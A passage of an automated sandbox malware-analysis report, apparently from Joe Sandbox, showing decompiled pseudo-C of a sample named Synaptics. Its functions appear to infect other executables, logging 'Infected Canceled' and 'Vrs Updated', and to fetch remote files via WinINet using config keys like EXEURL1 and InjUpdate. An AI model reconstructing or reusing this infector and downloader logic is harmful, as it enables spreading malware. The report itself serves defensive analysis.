                                                                                                                                                                                                                            					E004758E8(_v56, _t191,  &_v52, _t252);
                                                                                                                                                                                                                            					E00404A14(0x49f15c, _v52);
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t191))( &_v64, 0);
                                                                                                                                                                                                                            					_t255 =  *0x49f168; // 0x21e30f4
                                                                                                                                                                                                                            					E004758E8(_v64, _t191,  &_v60, _t255);
                                                                                                                                                                                                                            					E00404A14(0x49f168, _v60);
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t191))( &_v72, 0);
                                                                                                                                                                                                                            					_t258 =  *0x49f16c; // 0x21e314c
                                                                                                                                                                                                                            					E004758E8(_v72, _t191,  &_v68, _t258);
                                                                                                                                                                                                                            					E00404A14(0x49f168, _v68);
                                                                                                                                                                                                                            					_t267 =  *_t191;
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t191))( &_v80, 0);
                                                                                                                                                                                                                            					_t261 =  *0x49f170; // 0x21e3198
                                                                                                                                                                                                                            					E004758E8(_v80, _t191,  &_v76, _t261);
                                                                                                                                                                                                                            					E00404A14(0x49f168, _v76);
                                                                                                                                                                                                                            					_t172 =  *0x49f15c; // 0x21e2fec
                                                                                                                                                                                                                            					_t173 = E00409628(_t172, _t273, _t280);
                                                                                                                                                                                                                            					_t174 =  *0x49f140; // 0x21e2a8c
                                                                                                                                                                                                                            					E004957B4(_t174, _t173);
                                                                                                                                                                                                                            					_t176 =  *0x49f1c8; // 0x21e0774
                                                                                                                                                                                                                            					_t281 = E00409628(_t176, _t273, _t280) -  *0x49f14c; // 0x6a
                                                                                                                                                                                                                            					if(_t281 <= 0) {
                                                                                                                                                                                                                            						_t178 =  *0x49f13c; // 0x21e2354
                                                                                                                                                                                                                            						E004967D4(_t178, _t191, 0x4981ec);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_v21 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E00403BEC(_t191);
                                                                                                                                                                                                                            					E00409BAC(_v8);
                                                                                                                                                                                                                            					_pop(_t265);
                                                                                                                                                                                                                            					_pop(_t210);
                                                                                                                                                                                                                            					 *[fs:eax] = _t265;
                                                                                                                                                                                                                            					goto L18;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            0x0049803c
                                                                                                                                                                                                                            0x0049803c
                                                                                                                                                                                                                            0x0049802f
                                                                                                                                                                                                                            0x0049802f
                                                                                                                                                                                                                            0x0049802f
                                                                                                                                                                                                                            0x00498044
                                                                                                                                                                                                                            0x00498045
                                                                                                                                                                                                                            0x0049804a
                                                                                                                                                                                                                            0x0049804d
                                                                                                                                                                                                                            0x00498053
                                                                                                                                                                                                                            0x00498060
                                                                                                                                                                                                                            0x00498065
                                                                                                                                                                                                                            0x004980c2
                                                                                                                                                                                                                            0x004980c7
                                                                                                                                                                                                                            0x004980cc
                                                                                                                                                                                                                            0x004980ce
                                                                                                                                                                                                                            0x004980d7
                                                                                                                                                                                                                            0x004980d7
                                                                                                                                                                                                                            0x00498067
                                                                                                                                                                                                                            0x00498072
                                                                                                                                                                                                                            0x0049807e
                                                                                                                                                                                                                            0x0049809a
                                                                                                                                                                                                                            0x0049809f
                                                                                                                                                                                                                            0x004980a4
                                                                                                                                                                                                                            0x004980a6
                                                                                                                                                                                                                            0x004980af
                                                                                                                                                                                                                            0x004980af
                                                                                                                                                                                                                            0x00498080
                                                                                                                                                                                                                            0x00498087
                                                                                                                                                                                                                            0x00498087
                                                                                                                                                                                                                            0x0049807e
                                                                                                                                                                                                                            0x004980de
                                                                                                                                                                                                                            0x004980e1
                                                                                                                                                                                                                            0x004980f2
                                                                                                                                                                                                                            0x004980f5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004980f5
                                                                                                                                                                                                                            0x00497f97
                                                                                                                                                                                                                            0x00497e11
                                                                                                                                                                                                                            0x00497e27
                                                                                                                                                                                                                            0x00497e2f
                                                                                                                                                                                                                            0x00497e35
                                                                                                                                                                                                                            0x00497e42
                                                                                                                                                                                                                            0x00497e5b
                                                                                                                                                                                                                            0x00497e63
                                                                                                                                                                                                                            0x00497e69
                                                                                                                                                                                                                            0x00497e76
                                                                                                                                                                                                                            0x00497e8f
                                                                                                                                                                                                                            0x00497e97
                                                                                                                                                                                                                            0x00497e9d
                                                                                                                                                                                                                            0x00497eaa
                                                                                                                                                                                                                            0x00497ec3
                                                                                                                                                                                                                            0x00497ecb
                                                                                                                                                                                                                            0x00497ed1
                                                                                                                                                                                                                            0x00497ede
                                                                                                                                                                                                                            0x00497ef5
                                                                                                                                                                                                                            0x00497ef7
                                                                                                                                                                                                                            0x00497eff
                                                                                                                                                                                                                            0x00497f05
                                                                                                                                                                                                                            0x00497f12
                                                                                                                                                                                                                            0x00497f17
                                                                                                                                                                                                                            0x00497f1c
                                                                                                                                                                                                                            0x00497f23
                                                                                                                                                                                                                            0x00497f28
                                                                                                                                                                                                                            0x00497f2d
                                                                                                                                                                                                                            0x00497f37
                                                                                                                                                                                                                            0x00497f3d
                                                                                                                                                                                                                            0x00497f4a
                                                                                                                                                                                                                            0x00497f4f
                                                                                                                                                                                                                            0x00497f3f
                                                                                                                                                                                                                            0x00497f3f
                                                                                                                                                                                                                            0x00497f3f
                                                                                                                                                                                                                            0x00497f56
                                                                                                                                                                                                                            0x00497f5e
                                                                                                                                                                                                                            0x00497f65
                                                                                                                                                                                                                            0x00497f67
                                                                                                                                                                                                                            0x00497f68
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00497f68

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • Sleep.KERNEL32(0000EA60,00000000,0049814B,?,?,?,?,00000000,00000000), ref: 00497D15
                                                                                                                                                                                                                              • Part of subcall function 00473490: ShellExecuteEx.SHELL32(0000003C), ref: 00473512
                                                                                                                                                                                                                              • Part of subcall function 00473490: WaitForSingleObject.KERNEL32(00000000,00000032,00000000,00473564,?,00000000), ref: 00473536
                                                                                                                                                                                                                              • Part of subcall function 0045A800: PostQuitMessage.USER32(00000000), ref: 0045A80B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExecuteMessageObjectPostQuitShellSingleSleepWait
                                                                                                                                                                                                                            • String ID: .exe$.ini$EXEURL1$InjUpdate$PORT$VER
                                                                                                                                                                                                                            • API String ID: 1631069871-204213252
                                                                                                                                                                                                                            • Opcode ID: 55b519f68e2bb60c12d9a59471a109a20816d433321419680486cc4de4f5ceb1
                                                                                                                                                                                                                            • Instruction ID: 45283d241bb881e06991861ba9452227acefdf6b6ef9343d0a562746dac06cd8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55b519f68e2bb60c12d9a59471a109a20816d433321419680486cc4de4f5ceb1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BC15130604108DFDF10EB69D852A9E7BB5EB96304F61847BE500E7391DB38AD0ACB5D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                                                                                            			E004776D4(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                            				char _v56;
                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                            				char _v68;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                            				char _t96;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t106;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t107;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t109;
                                                                                                                                                                                                                            				void* _t112;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t113;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t132;
                                                                                                                                                                                                                            				intOrPtr _t156;
                                                                                                                                                                                                                            				intOrPtr _t180;
                                                                                                                                                                                                                            				intOrPtr _t191;
                                                                                                                                                                                                                            				intOrPtr _t205;
                                                                                                                                                                                                                            				intOrPtr _t206;
                                                                                                                                                                                                                            				intOrPtr _t210;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t203 = __esi;
                                                                                                                                                                                                                            				_t202 = __edi;
                                                                                                                                                                                                                            				_t205 = _t206;
                                                                                                                                                                                                                            				_t156 = 7;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_t156 = _t156 - 1;
                                                                                                                                                                                                                            				} while (_t156 != 0);
                                                                                                                                                                                                                            				_push(_t156);
                                                                                                                                                                                                                            				_t1 =  &_v8;
                                                                                                                                                                                                                            				 *_t1 = _t156;
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                            				_v16 =  *_t1;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v12);
                                                                                                                                                                                                                            				E00404E70(_v16);
                                                                                                                                                                                                                            				_push(_t205);
                                                                                                                                                                                                                            				_push(0x4778dd);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t206;
                                                                                                                                                                                                                            				if( *((intOrPtr*)( *_v8 + 0x14))() - 1 < 0) {
                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                            					_pop(_t180);
                                                                                                                                                                                                                            					 *[fs:eax] = _t180;
                                                                                                                                                                                                                            					_push(E004778E4);
                                                                                                                                                                                                                            					E004049E4( &_v68, 0xb);
                                                                                                                                                                                                                            					return E004049E4( &_v16, 2);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t95 =  *((intOrPtr*)( *_v8 + 0x14))() - 1;
                                                                                                                                                                                                                            				if(_t95 < 0) {
                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t96 = _t95 + 1;
                                                                                                                                                                                                                            				_t210 = _t96;
                                                                                                                                                                                                                            				_v24 = _t96;
                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_v8 + 0xc))();
                                                                                                                                                                                                                            					if(E00409A48(_v28, _t210) != 0) {
                                                                                                                                                                                                                            						 *[fs:eax] = _t206;
                                                                                                                                                                                                                            						_t146 =  *_v8;
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x47789f, _t205);
                                                                                                                                                                                                                            						_t106 = LoadLibraryA(E00404E80(_v32)); // executed
                                                                                                                                                                                                                            						 *0x49ec78 = _t106;
                                                                                                                                                                                                                            						_t107 =  *0x49ec78; // 0x3c30000
                                                                                                                                                                                                                            						if(E004770E4(_t107,  *_v8, _v16, _t202, _t203) != 0) {
                                                                                                                                                                                                                            							_t109 =  *0x49ec78; // 0x3c30000
                                                                                                                                                                                                                            							E0047717C(_t109, _t146,  &_v48, _v16, _t202, _t203);
                                                                                                                                                                                                                            							_t112 = E00409628(_v48, _t205, __eflags);
                                                                                                                                                                                                                            							__eflags = _t112 - _a8;
                                                                                                                                                                                                                            							if(_t112 >= _a8) {
                                                                                                                                                                                                                            								_t113 =  *0x49ec78; // 0x3c30000
                                                                                                                                                                                                                            								FreeLibrary(_t113);
                                                                                                                                                                                                                            								 *((intOrPtr*)( *_v8 + 0xc))();
                                                                                                                                                                                                                            								E00404CCC( &_v64, _v68, "Infected Canceled -> ");
                                                                                                                                                                                                                            								 *((intOrPtr*)( *_v8 + 0x20))();
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								 *((intOrPtr*)( *_v8 + 0xc))();
                                                                                                                                                                                                                            								E004774A8(_v52,  *_v8, _v12, _t202, _t203, 1);
                                                                                                                                                                                                                            								 *((intOrPtr*)( *_v8 + 0xc))();
                                                                                                                                                                                                                            								E00404CCC( &_v56, _v60, "Vrs Updated -> ");
                                                                                                                                                                                                                            								 *((intOrPtr*)( *_v8 + 0x20))();
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t132 =  *0x49ec78; // 0x3c30000
                                                                                                                                                                                                                            							FreeLibrary(_t132); // executed
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0xc))();
                                                                                                                                                                                                                            							E004774A8(_v36,  *_v8, _v12, _t202, _t203, 0); // executed
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0xc))();
                                                                                                                                                                                                                            							E00404CCC( &_v40, _v44, "Completed -> ");
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0x20))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_pop(_t191);
                                                                                                                                                                                                                            						 *[fs:eax] = _t191;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v20 = _v20 + 1;
                                                                                                                                                                                                                            					_t75 =  &_v24;
                                                                                                                                                                                                                            					 *_t75 = _v24 - 1;
                                                                                                                                                                                                                            				} while ( *_t75 != 0);
                                                                                                                                                                                                                            				goto L13;
                                                                                                                                                                                                                            			}


































                                                                                                                                                                                                                            0x00477766
                                                                                                                                                                                                                            0x00477772
                                                                                                                                                                                                                            0x00477774
                                                                                                                                                                                                                            0x00477780
                                                                                                                                                                                                                            0x00477785
                                                                                                                                                                                                                            0x0047778d
                                                                                                                                                                                                                            0x00477799
                                                                                                                                                                                                                            0x004777fb
                                                                                                                                                                                                                            0x00477800
                                                                                                                                                                                                                            0x00477808
                                                                                                                                                                                                                            0x0047780d
                                                                                                                                                                                                                            0x00477810
                                                                                                                                                                                                                            0x0047785e
                                                                                                                                                                                                                            0x00477864
                                                                                                                                                                                                                            0x00477874
                                                                                                                                                                                                                            0x00477882
                                                                                                                                                                                                                            0x00477892
                                                                                                                                                                                                                            0x00477812
                                                                                                                                                                                                                            0x0047781f
                                                                                                                                                                                                                            0x0047782b
                                                                                                                                                                                                                            0x0047783b
                                                                                                                                                                                                                            0x00477849
                                                                                                                                                                                                                            0x00477859
                                                                                                                                                                                                                            0x00477859
                                                                                                                                                                                                                            0x0047779b
                                                                                                                                                                                                                            0x0047779b
                                                                                                                                                                                                                            0x004777a1
                                                                                                                                                                                                                            0x004777b3
                                                                                                                                                                                                                            0x004777bf
                                                                                                                                                                                                                            0x004777cf
                                                                                                                                                                                                                            0x004777dd
                                                                                                                                                                                                                            0x004777ed
                                                                                                                                                                                                                            0x004777ed
                                                                                                                                                                                                                            0x00477897
                                                                                                                                                                                                                            0x0047789a
                                                                                                                                                                                                                            0x0047789a
                                                                                                                                                                                                                            0x004778a9
                                                                                                                                                                                                                            0x004778ac
                                                                                                                                                                                                                            0x004778ac
                                                                                                                                                                                                                            0x004778ac
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?,00000000,00000006,00000000,00000000,004967CC,?,00498487,00000001,0000006A,?,00000000), ref: 00477780
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(03C30000,00000000,?,?,?,?,00000000,00000006,00000000,00000000,004967CC,?,00498487,00000001,0000006A), ref: 004777A1
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(03C30000,00000000,?,?,?,?,00000000,00000006,00000000,00000000,004967CC,?,00498487,00000001,0000006A), ref: 00477864
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Free$Load
                                                                                                                                                                                                                            • String ID: Completed -> $Infected Canceled -> $Vrs Updated ->
                                                                                                                                                                                                                            • API String ID: 2391024519-3592865843
                                                                                                                                                                                                                            • Opcode ID: 20c501d661f2755b7fe8a39ab36196b97aea8b016f3c9e4efb946257bbdf6581
                                                                                                                                                                                                                            • Instruction ID: 17185f43945d3bc0c2e5cc5bb4bd267fdef97e65ffff577caacc568d39ef9c26
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20c501d661f2755b7fe8a39ab36196b97aea8b016f3c9e4efb946257bbdf6581
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32611878A04209DFDB04EFA5C8849EEB7B5FF48300F6180A6E904A7351CB34AE05CF65
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E004587A4(void* __eax, void* __ebx, void* __ecx, void* __edi) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				struct tagLOGFONTA _v65;
                                                                                                                                                                                                                            				struct tagLOGFONTA _v185;
                                                                                                                                                                                                                            				struct tagLOGFONTA _v245;
                                                                                                                                                                                                                            				void _v405;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				int _t27;
                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                                                                                            				struct HFONT__* _t41;
                                                                                                                                                                                                                            				struct HFONT__* _t45;
                                                                                                                                                                                                                            				struct HFONT__* _t49;
                                                                                                                                                                                                                            				intOrPtr _t52;
                                                                                                                                                                                                                            				intOrPtr _t54;
                                                                                                                                                                                                                            				void* _t57;
                                                                                                                                                                                                                            				void* _t72;
                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t72 = __edi;
                                                                                                                                                                                                                            				_t74 = _t75;
                                                                                                                                                                                                                            				_t76 = _t75 + 0xfffffe6c;
                                                                                                                                                                                                                            				_t57 = __eax;
                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                            				if( *0x49ebb8 != 0) {
                                                                                                                                                                                                                            					_t54 =  *0x49ebb8; // 0x21e1714
                                                                                                                                                                                                                            					_t2 = _t54 + 0x88; // 0x1
                                                                                                                                                                                                                            					_v5 =  *_t2;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(_t74);
                                                                                                                                                                                                                            				_push(0x4588e9);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t76;
                                                                                                                                                                                                                            				if( *0x49ebb8 != 0) {
                                                                                                                                                                                                                            					_t52 =  *0x49ebb8; // 0x21e1714
                                                                                                                                                                                                                            					E0045AD24(_t52, 0);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
                                                                                                                                                                                                                            					_t23 = GetStockObject(0xd);
                                                                                                                                                                                                                            					_t7 = _t57 + 0x84; // 0x38004010
                                                                                                                                                                                                                            					E00424FCC( *_t7, _t23, _t72);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t49 = CreateFontIndirectA( &_v65); // executed
                                                                                                                                                                                                                            					_t6 = _t57 + 0x84; // 0x38004010
                                                                                                                                                                                                                            					E00424FCC( *_t6, _t49, _t72);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v405 = 0x154;
                                                                                                                                                                                                                            				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
                                                                                                                                                                                                                            				if(_t27 == 0) {
                                                                                                                                                                                                                            					_t14 = _t57 + 0x80; // 0x94000000
                                                                                                                                                                                                                            					E004250B0( *_t14, 8);
                                                                                                                                                                                                                            					_t30 = GetStockObject(0xd);
                                                                                                                                                                                                                            					_t15 = _t57 + 0x88; // 0x90000000
                                                                                                                                                                                                                            					E00424FCC( *_t15, _t30, _t72);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t41 = CreateFontIndirectA( &_v185);
                                                                                                                                                                                                                            					_t11 = _t57 + 0x80; // 0x94000000
                                                                                                                                                                                                                            					E00424FCC( *_t11, _t41, _t72);
                                                                                                                                                                                                                            					_t45 = CreateFontIndirectA( &_v245);
                                                                                                                                                                                                                            					_t13 = _t57 + 0x88; // 0x90000000
                                                                                                                                                                                                                            					E00424FCC( *_t13, _t45, _t72);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t16 = _t57 + 0x80; // 0x94000000
                                                                                                                                                                                                                            				E00424E10( *_t16, 0xff000017);
                                                                                                                                                                                                                            				_t17 = _t57 + 0x88; // 0x90000000
                                                                                                                                                                                                                            				E00424E10( *_t17, 0xff000007);
                                                                                                                                                                                                                            				 *[fs:eax] = 0xff000007;
                                                                                                                                                                                                                            				_push(0x4588f0);
                                                                                                                                                                                                                            				if( *0x49ebb8 != 0) {
                                                                                                                                                                                                                            					_t38 =  *0x49ebb8; // 0x21e1714
                                                                                                                                                                                                                            					return E0045AD24(_t38, _v5);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004587F8
                                                                                                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00458805
                                                                                                                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 0045881B
                                                                                                                                                                                                                              • Part of subcall function 004250B0: MulDiv.KERNEL32(00000000,?,00000048), ref: 004250BD
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00458844
                                                                                                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00458854
                                                                                                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 0045886D
                                                                                                                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 00458893
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2891467149-0
                                                                                                                                                                                                                            • Opcode ID: 1d318198154b46cf8f2b40026440cf65ed92ca40f81abb2fb166fbe13c1f9689
                                                                                                                                                                                                                            • Instruction ID: c8c9ae32e1ca622756d665ee7f261621c5687007f21876862268219cdbc985ab
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d318198154b46cf8f2b40026440cf65ed92ca40f81abb2fb166fbe13c1f9689
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E318330B042449FE750FBA9DC42B9973A4EB44305F9440BABD08EB2D7DE78A949C729
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 61%
                                                                                                                                                                                                                            			E00474FC0(void* __eax, void* __ebx, void* __edx, void* __esi) {
                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                            				void _v1042;
                                                                                                                                                                                                                            				char _v1048;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            				int _t40;
                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                            				void* _t60;
                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t62 = _t63;
                                                                                                                                                                                                                            				_t64 = _t63 + 0xfffffbec;
                                                                                                                                                                                                                            				_v1048 = 0;
                                                                                                                                                                                                                            				_t47 = __edx;
                                                                                                                                                                                                                            				_t60 = __eax;
                                                                                                                                                                                                                            				_push(_t62);
                                                                                                                                                                                                                            				_push(0x4750fb);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t64;
                                                                                                                                                                                                                            				E004049C0(__edx);
                                                                                                                                                                                                                            				_v8 = InternetOpenA("MyApp", 0, 0, 0, 0);
                                                                                                                                                                                                                            				_push(_t62);
                                                                                                                                                                                                                            				_push(0x4750db);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t64;
                                                                                                                                                                                                                            				if(_v8 == 0) {
                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                            					_pop(_t55);
                                                                                                                                                                                                                            					 *[fs:eax] = _t55;
                                                                                                                                                                                                                            					_push(E004750E2);
                                                                                                                                                                                                                            					return InternetCloseHandle(_v8);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t32 = InternetOpenUrlA(_v8, E00404E80(_t60), 0, 0, 0x84000000, 0); // executed
                                                                                                                                                                                                                            					_v12 = _t32;
                                                                                                                                                                                                                            					if(_v12 == 0) {
                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_push(_t62);
                                                                                                                                                                                                                            						_push(0x4750bd);
                                                                                                                                                                                                                            						_push( *[fs:eax]);
                                                                                                                                                                                                                            						 *[fs:eax] = _t64;
                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                            							_v16 = 0x400;
                                                                                                                                                                                                                            							InternetReadFile(_v12,  &_v1042, 0x400,  &_v16); // executed
                                                                                                                                                                                                                            							if(_v16 == 0) {
                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							 *((char*)(_t62 + _v16 - 0x40e)) = 0;
                                                                                                                                                                                                                            							E00404C30( &_v1048, 0x402,  &_v1042);
                                                                                                                                                                                                                            							E00404C88(_t47, _v1048);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_pop(_t56);
                                                                                                                                                                                                                            						 *[fs:eax] = _t56;
                                                                                                                                                                                                                            						_push(E004750C4);
                                                                                                                                                                                                                            						_t40 = InternetCloseHandle(_v12); // executed
                                                                                                                                                                                                                            						return _t40;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • InternetOpenA.WININET(MyApp,00000000,00000000,00000000,00000000), ref: 00474FF9
                                                                                                                                                                                                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00475030
                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,00000400), ref: 0047506B
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004750B7
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004750D5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
